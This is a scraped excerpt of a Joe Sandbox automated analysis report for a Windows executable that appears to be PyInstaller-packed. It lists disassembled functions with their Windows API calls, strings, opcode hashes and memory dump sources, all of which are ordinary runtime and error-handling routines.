                                                                                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7A673653A
                                                                                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7A67364F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                        • API String ID: 1662231829-3498232454
                                                                                                                        • Opcode ID: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                        • Instruction ID: 3a3c263cea496f02c8708554abae6c6d28be2f322e7960fa75d03238a23b4eae
                                                                                                                        • Opcode Fuzzy Hash: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                        • Instruction Fuzzy Hash: 90317751B3A74241FA29B725AD753BBD251AF9CF80FC60035DA4E427FAEE2CE5048720
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737AF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 3723044601-876015163
                                                                                                                        • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction ID: 967a3ca7d297152a872328c344e5198b210a6ee30a34d39a2bc7ee97d4843f63
                                                                                                                        • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction Fuzzy Hash: 29217522B29A4281EB14EB29FC6016BE361FF8DB84F954175DB5C83BB9EE2CD5418710
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A62F
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A644
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A665
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A692
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6A3
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6B4
                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
• Instruction ID: 5242238de04645b5be0005924545c28a93733da7487ea7ac6329b58cb286e0b4
• Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
• Instruction Fuzzy Hash: 58217F20A2F24281F958B7255E7D13BE2419F4CFB0FD64734D83E076FAEE2CA4414622
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
• Instruction ID: 4c07a053eb3f35e06aa2a51c56a7e785b3bfd912e64eb7c907231335bd22a929
• Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
• Instruction Fuzzy Hash: BE115125A39A4186E750AB56EC6432AB3A0FB8CFE4F854234EA5D877A8DF7CD4048750
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A7A7
• FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A7DD
• FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A80A
• FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A81B
• FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A82C
• SetLastError.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A847
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
• Instruction ID: 6df063d0a4955ec81aa1ad2c0aa30e5c79200100e48560a8c2674b0eeb1cb4f6
• Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
• Instruction Fuzzy Hash: CB115E20E6E28242F569B7215D7D13BD2519F4CFB0FD64234D82E076FAEE2CA4428621
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
• Instruction ID: ccf7124226afa33427df31b4d77c0dca07b95b3b7121cde9b672d59fbb6d3bdf
• Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
• Instruction Fuzzy Hash: 3E51A632B2A60286D718EF15DC14A3AB795FB48F88F938131DA5A47768DF38E941D710
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
• Instruction ID: a5868c55de474b8a5715958861f313d52b3eae221401e78c37ad0b3982972075
• Opcode Fuzzy Hash: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
• Instruction Fuzzy Hash: 2A315572A2A68285EB14EF61EC651EAB350FF4DB84F810135EA4D47A69DF3CD145C710
APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
  • Part of subcall function 00007FF7A67374B0: GetLastError.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A67374D7
  • Part of subcall function 00007FF7A67374B0: FormatMessageW.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A6737506
  • Part of subcall function 00007FF7A6737A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
• MessageBoxW.USER32 ref: 00007FF7A673272C
• MessageBoxA.USER32 ref: 00007FF7A6732748
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: Message$ErrorLast$ByteCharFormatMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 2806210788-2410924014
• Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
• Instruction ID: da8d8634e3e2d2ac8a2dad7c57328b729b365ad173431f21f1b8d2ea3185ed07
• Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
• Instruction Fuzzy Hash: 9331237263968591E624BB10E8617DBA364FB88B84FC14036E68D076A9DF3CD645CB50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
• Instruction ID: 31d0e2e6b7777f44b0772492ec86a9b9fc3c947f65022709945357579086d472
• Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
• Instruction Fuzzy Hash: 87F0AF61A2AA0681EB10AB24EC6833A9320EF8DFA5FC90235C56D452F4CF2CD048C320
APIs
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction ID: add6ee5da73b4e70a20cd281d18b13ffea81cb57fddec07c2f59513221412c71
• Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction Fuzzy Hash: 0C11B622E3AA3B03F6943164DC613779441AF5CB64F9606B0E57E066FECE2CBC414561
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A87F
• FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A89E
• FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8C6
• FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8D7
• FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8E8
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
• Instruction ID: beccfd36791eedf0bc356e6abc101adc16c1d9a30bdc891d7bc20a90bf9a73ae
• Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
• Instruction Fuzzy Hash: 40113D20E2E28241FA59B7255D7D17BD2459F4DFB0FD64334E83D066FADE2CB4828621
APIs
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A705
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A724
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A74C
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A75D
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A76E
Memory Dump Source
• Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
• Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction ID: 2f560798387a1c280311d4b6bbcd65cb9ee7f51912f96fb4bf5144f3f7026518
                                                                                                                        • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction Fuzzy Hash: 0F11E324A6F20241F96AB7714C7E17B92928F4DF70FD64634D83E0A2FADD2CB4814231
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                        • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction ID: 91f8676f5144f9d3e0351ce47b97544b7f8d145d6b4e3a7ef9f6002b5871e135
                                                                                                                        • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction Fuzzy Hash: D481C975D2E14385F774AE39893C37EA690AB99F88FD74031CA09971B5CF2DE4019322
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                        • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction ID: e920d965a943bce3b80c2cecd72af5d01fa7079a2ee0b26b3005951358cdcc2b
                                                                                                                        • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction Fuzzy Hash: B1617D33A19B458AE714DF65D8803AEB7A0FB48B88F954226EF4D17BA4CF38E055C710
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                        • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction ID: 5f0aee9a31c1d9bab3ed19c00b2d7ff529d0812b4b145b7ec494741222a0ed67
                                                                                                                        • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction Fuzzy Hash: 1151B43252A241C6DB78AF15996436AB7A0EB48F88FD54136EB8C47BE5DF3CE490C710
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 1878133881-2410924014
                                                                                                                        • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction ID: 4810ebe8bc86fe6f684e84b1982e5981d339a725d5a9dff36c52a373e96f016a
                                                                                                                        • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
